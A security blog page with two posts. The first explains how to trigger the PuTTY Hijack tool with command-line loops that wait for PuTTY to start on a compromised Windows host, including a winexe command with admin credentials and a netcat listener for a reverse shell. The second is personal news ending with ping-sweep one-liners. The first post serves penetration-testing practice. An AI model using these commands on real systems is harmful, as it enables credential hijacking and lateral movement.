Cатсн²² (in)sесuяitу / ChrisJohnRiley

Because we're damned if we do, and we're damned if we don't!

Tag Archives: loop

PuTTY, oh PuTTY, where art thou ?

Don’t you just hate it when you’ve got that perfect exploit and the user just refuses to play ball. They’re never using the right application at the right time. It’s just so inconsiderate of them, and frankly, a waste of our time to be sitting and waiting for them all the time. All jesting aside, it’s a problem I’ve come across a few times when performing penetration tests, as I’m sure many people have. Sometimes you just can’t run a client-side exploit without an action from the client.

I was reading the excellent CarnalOwnage blog and came across a post about the newly released PuTTY Hijack tool from Insomnia. I’ve not had a chance to play with it myself as I’ve got a few other things on the boil right now. Including my SANS SEC:560 exam sometime in the next month. Anyway, back to the point. The PuTTY hijack tool relies on the user to be running a version of PuTTY at the time the exploit is run. Sounds straight forward, but as we’ll already covered, those users are never running on the same timescales we are.

To assist in using this tool at just the right time (i.e. when the user starts up PuTTY) you can use scripts to monitor the running processes until the user starts the software. Once the user opens the correct toolthe script can then kick off the client-side exploit and it’s game over. With this in mind I’ve created a couple small script (all at the command line) to check if a copy of PuTTY is running. Thee scripts can easily be changed to monitor for other processes as desired. That’s the beauty of scripts after all.

One of the downsides of having to monitor for specific processes is that you will need to already have local access to the remote system to run the script and check for an instance of PuTTY. If you want to run the monitoring remotely then you’re going to have to get local admin permissions as well. However getting admin permissions on the remote machine isn’t really the main point of this attack. The point is to use a client-side exploit to launch off from an already compromised system onto the next target, one that you don’t already have admin/root on.

To script up the attack you can do use a couple of different methods. If you’re worried about running a monitoring process on the already compromised box for any reason (the process or service could be discovered etc…) and would rather make some noise on the network instead, you can use the wmi-client (sudo apt-get install wmi-client under Debian style distros) or you can download a copy of winexe (if it’s not already installed by default) and do the monitoring remotely from a Linux system. The following command string connects to the remote server and grabs the list of running processes. It will continue to check for the process until somebody starts PuTTY on the remote box. It then kicks off a remote job to start a reverse shell back to your machine (netcat is automatically started to receive the connection on port 2222). As alreay mentioned, this method will require admin access to the remote system to perform the monitoring and kick off the attack program.

res="$(winexe -U DOMAIN/Administrator%Password // "wmic process list brief" | grep -i putty | grep -v grep | wc -l)"
&& while $result -eq 0 ]; do echo "PuTTY not running. Waiting 10 seconds before recheck"; sleep 10; done; nc -l -p 2222;
winexe -U DOMAIN/Administrator%Password // "/pathto/PuttyHijack 2222"

*This should all be on one line or in a shell script)

Given more time I’m sure somebody much more technically savvy than me (and a better programmer for sure) will come up with a better method of doing the same thing. Until then, this is better then nothing, or a good start depending on your opinions.

The other way to accomplish the same task is to run a similar monitoring job on the compromised Windows host. This will be easy to discover if the person is checking running processes or services on the machine. Then again, it will reduce the traffic compared to remote monitoring and the chances of been seen by IDS system or curious Network Engineer are reduced. It might also be your only option if you’re already tunneling through a number of pivot points on the way to the machine. It starts to get messy with all those netcat pivots points and backpipes after a while. The following 2 Windows commands should loop until putty.exe is seen and then kick off the puttyhijack program. How you run these is up to you. Options include AT command, Scheduled task or install it as a service using the SC command.

FOR /L %i in (1,0,2) do @wmic process list brief | findstr "putty.exe" && c:\pathto\PuttyHijack 2222 && exit

You can also fun the command using tasklist instead of  WMIC on older boxes.

FOR /L %i in (1,0,2) do @tasklist| findstr "putty.exe"&& c:\pathto\PuttyHijack 2222 && exit

You can always tag on further commands to run once a putty session is seen. Everything before the exit is run once the task is found as as long as the findstr command fails (i.e. finds nothing) then it will fail the check made by the && (only run if previous command succeeds). Have fun with it, and let me know if you make anything good out of it 😉

All props to the CarnalOwnage blog for initially bringing this to my attention and Ed Skoudis for the Command Line KungFu. Without it, you’re just bait…

Recap…. move on

So as it’s been a while since I took my hiatus, I need to bring everybody up to speed on what’s been happening the past few months. As I’m getting old and my memory isn’t what it used to be, I’ll try and be brief and expand on certain topics moving forward.

SANS Amsterdam

After some discussions with work we agreed that attending the new SANS 560 “Penetration Testing and Ethical Hacking” class would be a good thing. Well, I convinced myself it would be good, and then.. well you get the clue. The course was held near to the airport in Amsterdam and was great fun on all levels. Although amongst the fun nights on the town, coffee shops and interesting shows, I learned a lot. The course was listed as one of the most technical offered by SANS and although it didn’t seem to technical at the time (thanks to the excellent course material by Ed Skoudis, and the few relaxed and informative presentation by John Strand), however as I begin to renew the topics for the exam, things aren’t as easy as they seemed at the course. That said, I’m sure I’ll do well in the exam, as I’m hoping to do work with SANS again in the future, possibly as a Mentor or as part of the work/learn program.

My first Article

Some people already know that I decided to take a stab at writing something for a magazine a few months back. The process of writing was a little harder than I thought, and I’m sure my girlfriend and parents are happy it’s over. I think I emailed my father at least 4 copies to proof read, most of them changing so quickly that he could never finish reading one before a new draft was ready. Still, things are looking up as Linux Pro Magazine in the US will be running it in the next edition (hopefully). It kind of ran over a little on the word count.. if you ask for a few pages at 800 words a page and get about 5,000 words, then it can be hard to squeeze in 😉 Still look out for a Snort Intrusion Detection article in a shop near you soon…. for those already using Snort or other IDS’s, this was a basic setup article, so no new ground broken for the first article. Maybe next time.

Work, life and everything in-between

It’s nice to live in a country were you can go for a swim in a lake when it’s hot…. nothing nicer than just sitting by a lake and relaying (which I hope to do this weekend if the weather holds). The downside is, I’m English. We just tend to turn bright red, peel and then get pale again. Still, better than always being white eh 😉 Work is challenging as usual. My German skills are (hopefully) getting a little better as time goes past, and learning new things is always a plus. Anyway, enough about work…. Gika (my girlfriend) has just finished University and it’s starting full-time at a web-content provider in the next few weeks. I’m very proud of her, as it’s been tough the last 3 years, dealing with University and me on-top. After all in our relationship I’ve lived in 3 different countries. If that’s not stressful then what is 😉 I like where I’m at now and don’t think I’d be anywhere near this place in my life, career and mind without her.

So expect some technical content coming up soon… it’s been too long since I’ve posted a command-line into this blog. So I’ll leave you with this to keep you busy.

for /F %i IN (hostname.txt) DO @ping -n 1 -w 500 %i | find /I “reply”

for /L %i IN (1,1,255) DO @ping -n 1 -w 500 192.168.0.%i | find /I “reply”

They’re quick and dirty… but if you need a ping sweep quick sharp, it’s tell you what’s up and what’s not. The first will do all hosts listed in a file, single ICMP packet with a timeout of 500ms. The second does the same ping but using all IP addresses from The FIND command filters the responses to only inform you of valid replies. For some much better examples you should checkout the Ed Skoudis presentations on command-line kung-fu. Check the SANS website.